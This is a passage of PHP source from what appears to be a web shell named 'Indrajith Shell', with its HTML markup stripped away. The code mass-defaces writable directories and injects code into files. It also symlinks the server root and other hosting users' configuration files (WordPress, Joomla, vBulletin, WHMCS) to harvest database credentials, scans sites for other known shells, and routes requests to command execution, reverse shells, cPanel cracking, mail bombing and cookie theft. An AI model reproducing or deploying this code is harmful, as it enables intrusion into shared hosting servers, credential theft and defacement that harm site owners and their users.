Result ";
$ftp_list=$_GET['ftp_anonz'];
$xftpl = trim($ftp_list);
$xftpl = explode("\n", $xftpl);
foreach($xftpl as $xftp)
{
$xftp = str_replace("ftp://", "", $xftp);
$conn_ftp = ftp_connect($xftp);
$success = ftp_login($conn_ftp, "anonymous", "");
if($success)
{
echo "$xftp Successfull ";
}
else
{
echo "$xftp Failed ";
}
}
echo "
";
}
function mass_deface_ui()
{
echo "
";
}
function mass_deface_bg()
{
global $sep;
$d_path=$_GET['mm_path'];
chdir($d_path);
$d_file=$_GET['mass_name'];
$d_conten=$_GET['mass_cont'];
if(is_dir($d_path))
{
chdir($d_path);
$d_dirs=array();
if($handle=opendir($d_path))
{
while(($item=readdir($handle))!==FALSE)
{
if($item=="."){continue;}
if($item==".."){continue;}
if(is_dir($item))
{
array_push($d_dirs, $item);
}
}
}
}
echo "
Result ";
foreach($d_dirs as $d_dir)
{
$xd_path=getcwd()."$sep$d_dir$sep$d_file";
if(is_writable($d_dir))
{
$handle=fopen($xd_path, "wb");
if($handle)
{
fwrite($handle, $d_conten);
}
}
echo "$xd_path ";
}
echo "
";
}
function symlinkg($usernamexx,$domainxx)
{
symlink('/home/'.$usernamexx.'/public_html/vb/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin1.txt');
symlink('/home/'.$usernamexx.'/public_html/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin2.txt');
symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin3.txt');
symlink('/home/'.$usernamexx.'/public_html/cc/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin4.txt');
symlink('/home/'.$usernamexx.'/public_html/inc/config.php','Indrajith/'.$domainxx.' =>mybb.txt');
symlink('/home/'.$usernamexx.'/public_html/config.php','Indrajith/'.$domainxx.' =>Phpbb1.txt');
symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>Phpbb2.txt');
symlink('/home/'.$usernamexx.'/public_html/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress1.txt');
symlink('/home/'.$usernamexx.'/public_html/blog/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress2.txt');
symlink('/home/'.$usernamexx.'/public_html/configuration.php','Indrajith/'.$domainxx.' =>Joomla1.txt');
symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php','Indrajith/'.$domainxx.' =>Joomla2.txt');
symlink('/home/'.$usernamexx.'/public_html/joomla/configuration.php','Indrajith/'.$domainxx.' =>Joomla3.txt');
symlink('/home/'.$usernamexx.'/public_html/whm/configuration.php','Indrajith/'.$domainxx.' =>Whm1.txt');
symlink('/home/'.$usernamexx.'/public_html/whmc/configuration.php','Indrajith/'.$domainxx.' =>Whm2.txt');
symlink('/home/'.$usernamexx.'/public_html/support/configuration.php','Indrajith/'.$domainxx.' =>Whm3.txt');
symlink('/home/'.$usernamexx.'/public_html/client/configuration.php','Indrajith/'.$domainxx.' =>Whm4.txt');
symlink('/home/'.$usernamexx.'/public_html/billings/configuration.php','Indrajith/'.$domainxx.' =>Whm5.txt');
symlink('/home/'.$usernamexx.'/public_html/billing/configuration.php','Indrajith/'.$domainxx.' =>Whm6.txt');
symlink('/home/'.$usernamexx.'/public_html/clients/configuration.php','Indrajith/'.$domainxx.' =>Whm7.txt');
symlink('/home/'.$usernamexx.'/public_html/whmcs/configuration.php','Indrajith/'.$domainxx.' =>Whm8.txt');
symlink('/home/'.$usernamexx.'/public_html/order/configuration.php','Indrajith/'.$domainxx.' =>Whm9.txt');
symlink('/home/'.$usernamexx.'/public_html/admin/conf.php','Indrajith/'.$domainxx.' =>5.txt');
symlink('/home/'.$usernamexx.'/public_html/admin/config.php','Indrajith/'.$domainxx.' =>4.txt');
symlink('/home/'.$usernamexx.'/public_html/conf_global.php','Indrajith/'.$domainxx.' =>invisio.txt');
symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>7.txt');
symlink('/home/'.$usernamexx.'/public_html/connect.php','Indrajith/'.$domainxx.' =>8.txt');
symlink('/home/'.$usernamexx.'/public_html/mk_conf.php','Indrajith/'.$domainxx.' =>mk-portale1.txt');
symlink('/home/'.$usernamexx.'/public_html/include/config.php','Indrajith/'.$domainxx.' =>12.txt');
symlink('/home/'.$usernamexx.'/public_html/settings.php','Indrajith/'.$domainxx.' =>Smf.txt');
symlink('/home/'.$usernamexx.'/public_html/includes/functions.php','Indrajith/'.$domainxx.' =>phpbb3.txt');
symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>infinity.txt');
}
function config_grabber_bg()
{
global $sym_htaccess,$sym_php_ini;
mkdir('INDRAJITH', 0777);
symlink("/", "INDRAJITH/root");
$htaccess=fopen('INDRAJITH/.htaccess', 'wb');
fwrite($htaccess,$sym_htaccess);
$php_ini_x=fopen('INDRAJITH/php.ini', 'wb');
fwrite($php_ini_x, $sym_php_ini);
$usr=explode("\n",$_POST['user_z_list']);
foreach($usr as $uzer)
{
$u_er=trim($uzer);
symlinggg($u_er);
}
echo "";
alert('Config Grab compted. Check configs in direcory INDRAJITH');
}
if(isset($_POST['user_z_list']))
{
config_grabber_bg();
}
function config_grabber_ui()
{
if(file('/etc/passwd'))
{
?>
blog/configuration.php");
symlink('/home/'.$user.'/public_html/forum/includes/config.php', "INDRAJITH/".$user." =>forum/includes/config.php");
symlink("/home/".$user."/public_html/wp-config.php", "INDRAJITH/".$user." =>wp-config.php");
symlink("/home/".$user."/public_html/wordpress/wp-config.php", "INDRAJITH/".$user." =>wordpress/wp-config.php");
symlink("/home/".$user."/public_html/configuration.php", "INDRAJITH/".$user." =>configuration.php");
symlink("/home/".$user."/public_html/blog/wp-config.php", "INDRAJITH/".$user." =>blog/wp-config.php");
symlink("/home/".$user."/public_html/joomla/configuration.php", "INDRAJITH/".$user." =>joomla/configuration.php");
symlink("/home/".$user."/public_html/vb/includes/config.php", "INDRAJITH/".$user." =>vb/includes/config.php");
symlink("/home/".$user."/public_html/includes/config.php", "INDRAJITH/".$user." =>includes/config.php");
symlink("/home/".$user."/public_html/conf_global.php", "INDRAJITH/".$user." =>conf_global.php");
symlink("/home/".$user."/public_html/inc/config.php", "INDRAJITH/".$user." =>inc/config.php");
symlink("/home/".$user."/public_html/config.php", "INDRAJITH/".$user." =>config.php");
symlink("/home/".$user."/public_html/Settings.php", "INDRAJITH/".$user." =>/Settings.php");
symlink("/home/".$user."/public_html/sites/default/settings.php", "INDRAJITH/".$user." =>sites/default/settings.php");
symlink("/home/".$user."/public_html/whm/configuration.php", "INDRAJITH/".$user." =>whm/configuration.php");
symlink("/home/".$user."/public_html/whmcs/configuration.php", "INDRAJITH/".$user." =>whmcs/configuration.php");
symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
symlink("/home/".$user."/public_html/whmc/WHM/configuration.php", "INDRAJITH/".$user." =>whmc/WHM/configuration.php");
symlink("/home/".$user."/public_html/whm/WHMCS/configuration.php", "INDRAJITH/".$user." =>whm/WHMCS/configuration.php");
symlink("/home/".$user."/public_html/whm/whmcs/configuration.php", "INDRAJITH/".$user." =>whm/whmcs/configuration.php");
symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
symlink("/home/".$user."/public_html/clients/configuration.php", "INDRAJITH/".$user." =>clients/configuration.php");
symlink("/home/".$user."/public_html/client/configuration.php", "INDRAJITH/".$user." =>client/configuration.php");
symlink("/home/".$user."/public_html/clientes/configuration.php", "INDRAJITH/".$user." =>clientes/configuration.php");
symlink("/home/".$user."/public_html/cliente/configuration.php", "INDRAJITH/".$user." =>cliente/configuration.php");
symlink("/home/".$user."/public_html/clientsupport/configuration.php", "INDRAJITH/".$user." =>clientsupport/configuration.php");
symlink("/home/".$user."/public_html/billing/configuration.php", "INDRAJITH/".$user." =>billing/configuration.php");
symlink("/home/".$user."/public_html/admin/config.php", "INDRAJITH/".$user." =>admin/config.php");
}
function sym_xxx()
{
global $sym_htaccess,$sym_php_ini;
mkdir('Indrajith', 0777);
symlink("/", "Indrajith/root");
$htaccess=@fopen('Indrajith/.htaccess', 'w');
fwrite($htaccess,$sym_htaccess);
$php_ini_x=fopen('Indrajith/php.ini', 'w');
fwrite($php_ini_x, $sym_php_ini);
$akps = implode(file("/etc/named.conf"));
if(!$akps)
{
config_grabber_ui();
}
else
{
$usrd = array();
foreach($akps as $akp)
{
if(eregi("zone", $akp))
{
preg_match_all('#zone "(.*)" #', $akp, $akpzz);
flush();
if(strlen(trim($akpzz[1][0]))>2)
{
$user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
symlinkg($akpzz[1][0],$user['name']);
flush();
}
}
}
}
}
function sym_link()
{
global $sym_htaccess,$sym_php_ini;
cmd('rm -rf AKP');
mkdir('AKP', 0755);
$usrd = array();
$akps = implode(file("/etc/named.conf"));
$htaccess=fopen('AKP/.htaccess', 'w');
fwrite($htaccess,$sym_htaccess);
$php_ini_x=fopen('AKP/php.ini', 'w');
fwrite($php_ini_x, $sym_php_ini);
symlink("/", "AKP/root");
if(!$file)
{
echo "";
echo "
SymLink Users Exploit ";
$users = file('/etc/passwd');
foreach($users as $user)
{
$user = explode(':', $user);
echo "".$user[0]." SymLink ";
}
echo "
";
}
else
{
echo "
Domains Users Exploit ";
foreach($akps as $akp)
{
if(eregi("zone", $akp))
{
preg_match_all('#zone "(.*)" #', $akp, $akpzz);
flush();
if(strlen(trim($akpzz[1][0]))>2)
{
$user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
echo "".$akpzz[1][0]." ".$user['name']." SymLink
";
flush();
}
}
}
}
}
function shell_finder_ui()
{
echo "
SH3LL SCANNER URL : ";
}
function shell_finder_bg()
{
$sh_url=$_GET['sh311_scanx'];
echo "SHELL SCAN ";
$ShellZ=array("indrajith.php", "c99.php", "c100.php","r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php","cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php");
foreach($ShellZ as $shell)
{
$urlzzx=$sh_url.$shell;
if(function_exists('curl_init'))
{
echo "Checking : $urlzzx ";
$ch = curl_init($urlzzx);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_exec($ch);
$status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($status_code==200)
{
echo " Found.... ";
}
else
{
echo "Not Found... ";
}
}
else
{
echo "cURL Not Found ";
break;
}
}
echo "
";
}
function code_in_ui()
{
global $sep;
$mode=$_POST['modexxx'];
$ftype=$_POST['ffttype'];
$c_cont=$_POST['code_cont'];
$ppp=$_POST['path'];
if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode!="" && $ftype!="" && $c_cont!="" && $ppp!="")
{
echo "Successfully c0d3 inj3cted ";
switch($mode)
{
case "Apender":
$mmode="a";
break;
case "Rewrite":
$mmode="w";
break;
}
if($handle = opendir($ppp))
{
while(($c_file = readdir($handle)) !== False)
{
if((preg_match("/$ftype".'$'.'/', $c_file , $matches) != 0) && (preg_match('/'.$c_file.'$/', $self , $matches) != 1))
{
echo "$ppp$sep$c_file ";
$fd = fopen($ppp.$sep.$c_file,$mmode);
if($fd)
{
fwrite($fd,$c_cont);
}
else
{
alert("Error. Access Denied");
}
}
}
}
echo "
";
}
else
{
?>
c0de inj3ct
SSH Shell by Indrajith Shell
CMD :
SSH Shell by Indrajith Shell
CMD :
FTP FILEMANAGER ";
$fhost=$_GET['ftp_host'];
$fuser=$_GET['ftp_user'];
$fpass=$_GET['ftp_pass'];
$fpath=$_GET['fpath'];
$upl=$_GET['upload_file'];
$down=$_GET['download_file'];
if($fpath=="")
{
$fpath=ftp_pwd($conn);
}
$conn=ftp_connect($fhost);
if(!$conn)
{
alert("FTP Host Not Found!!!");
}
if($fuser=="")
{
$fuser="anonymous";
}
$log=ftp_login($conn, $fuser, $fpass);
if(!$log)
{
alert("FTP Authorication Failed");
}
if($upl!="")
{
$fp = fopen($upl, 'r');
if (ftp_fput($conn, $upl, $fp, FTP_ASCII))
{
echo "
Successfully uploaded $upl ";
}
else
{
echo "
There was a problem while uploading $upl ";
}
}
if($down!="")
{
$handle = fopen($down, 'w');
if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0))
{
echo "
successfully written to $down ";
}
else
{
echo "
There was a problem while downloading $down to $down ";
}
}
echo "
Files ";
ftp_chdir($fpath);
$list=ftp_rawlist($conn, $fpath);
foreach($list as $fff)
{
echo "$fff ";
}
echo "
";
}
//////////////////////////////// Frond End Calls ///////////////////////////////
if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
{
edit_file_bg();
}
else if(isset($_REQUEST['sh311_scanner']))
{
shell_finder_ui();
}
else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass']))
{
ftp_man_bg();
}
else if(isset($_REQUEST['ftpman']))
{
ftp_man_ui();
}
else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass']))
{
ssh_man_bg();
}
else if(isset($_REQUEST['sshman']))
{
ssh_man_ui();
}
else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path']))
{
chdir($_GET['path']);
code_in_ui();
}
else if(isset($_GET['sh311_scanx']))
{
shell_finder_bg();
}
else if(isset($_REQUEST['config_grab']))
{
sym_xxx();
}
else if(isset($_REQUEST['ftp_man']))
{
ftp_man_ui();
}
else if(isset($_REQUEST['mass_xploit']))
{
mass_deface_ui();
}
else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass']))
{
ftp_man_bg();
}
else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
{
mass_deface_bg();
}
else if(isset($_REQUEST['ftp_anon_scan']))
{
ftp_anonymous_ui();
}
else if(isset($_GET['ftp_anonz']))
{
ftp_anonymous_bg();
}
else if(isset($_REQUEST['killme']))
{
killme();
}
else if(isset($_REQUEST['hexenc']))
{
hex_encode_ui();
}
else if(isset($_REQUEST['remotefiledown']))
{
remote_download_ui();
}
else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
{
remote_download_bg();
}
else if(isset($_REQUEST['cpanel_crack']))
{
cpanel_crack();
}
else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
{
remote_file_check_bg();
}
else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
{
php_ende_bg();
}
else if(isset($_REQUEST['remote_server_scan']))
{
remote_file_check_ui();
}
else if(isset($_REQUEST['server_exploit_details']))
{
exploit_details();
}
else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
{
massmailer_bg();
}
else if(isset($_REQUEST['mysqlman']))
{
mysqlman();
}
else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
{
mailbomb_bg();
}
else if(isset($_REQUEST['cookiejack']))
{
cookie_jack();
}
else if(isset($_REQUEST['massmailer']))
{
massmailer_ui();
}
else if(isset($_REQUEST['rename']))
{
chdir($_GET['path']);
rename_ui();
}
else if(isset($_GET['old_name']) && isset($_GET['new_name']))
{
chdir($_GET['path']);
rename_bg();
}
else if(isset($_REQUEST['encodefile']))
{
php_ende_ui();
}
else if(isset($_REQUEST['edit']))
{
edit_file();
}
else if(isset($_REQUEST['read']))
{
chdir($_GET['path']);
code_viewer();
}
else if(isset($_REQUEST['perm']))
{
chdir($_GET['path']);
ch_perm_ui();
}
else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
{
chdir($_GET['path']);
ch_perm_bg();
}
else if(isset($_REQUEST['del_fil']))
{
chdir($_GET['path']);
delete_file();
exit;
}
else if(isset($_REQUEST['phpinfo']))
{
chdir($_GET['path']);
ob_clean();
echo phpinfo();
exit;
}
else if(isset($_REQUEST['del_dir']))
{
chdir($_GET['path']);
$d_dir=$_GET['del_dir'];
deldirs($d_dir);
}
else if(isset($_GET['path']) && isset($_GET['new_file']))
{
chdir($_GET['path']);
mk_file_ui();
}
else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
{
mk_file_bg();
}
else if(isset($_GET['path']) && isset($_GET['new_dir']))
{
chdir($_GET['path']);
create_dir();
}
else if(isset($_GET['path']) && isset($_GET['cmdexe']))
{
chdir($_GET['path']);
cmd();
}
else if(isset($_POST['upload_f']) && isset($_POST['path']))
{
upload_file();
}
else if(isset($_REQUEST['rs']))
{
reverse_conn_ui();
}
else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
{
reverse_conn_bg();
}
else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
{
chdir($_GET['path']);
safe_mode_fuck_ui();
}
else if(isset($_GET['path']) && isset($_GET['safe_mode']))
{
safe_mode_fuck();
}
else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
{
AccessDenied();
}
else if(isset($_REQUEST['symlink']))
{
sym_link();
}
else if(isset($_GET['path']) && isset($_GET['copy']))
{
copy_file_ui();
}
else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
{
copy_file_bg();
}
else
{
filemanager_bg();
}
////////////////////////////// End Frond End Calls //////////////////////////////
echo ""
?>